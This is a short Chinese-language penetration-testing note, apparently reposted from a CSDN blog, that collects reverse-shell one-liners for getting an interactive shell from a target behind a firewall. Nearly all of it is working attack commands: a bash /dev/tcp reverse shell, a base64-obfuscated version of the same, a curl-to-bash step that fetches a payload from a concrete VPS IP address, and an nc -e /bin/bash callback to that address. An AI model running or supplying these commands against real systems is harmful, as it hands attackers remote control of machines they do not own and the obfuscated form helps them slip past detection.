在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
1. 靶机上执行
bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1
收到shell
2. 在特殊情况可以使用base64编码执行bash反弹shell
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'
1. vps开启一个web服务,端口80。并编写index.html文件,内容包含bash一句话即可
python3 -m http.server 80vim index.htmlbash -i >& /dev/tcp/vps ip/port 0>&1
2. vps开启监听
nc -lvnp 6666
3. 靶机执行
curl 39.100.88.162/index.html|bash
成功接收反弹shell
nc -e /bin/bash 39.100.88.162 8000
#或者是/bin/sh都行
-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。
原文链接:https://blog.csdn.net/qq_44159028/article/details/124318602
留言与评论(共有 0 条评论) “” |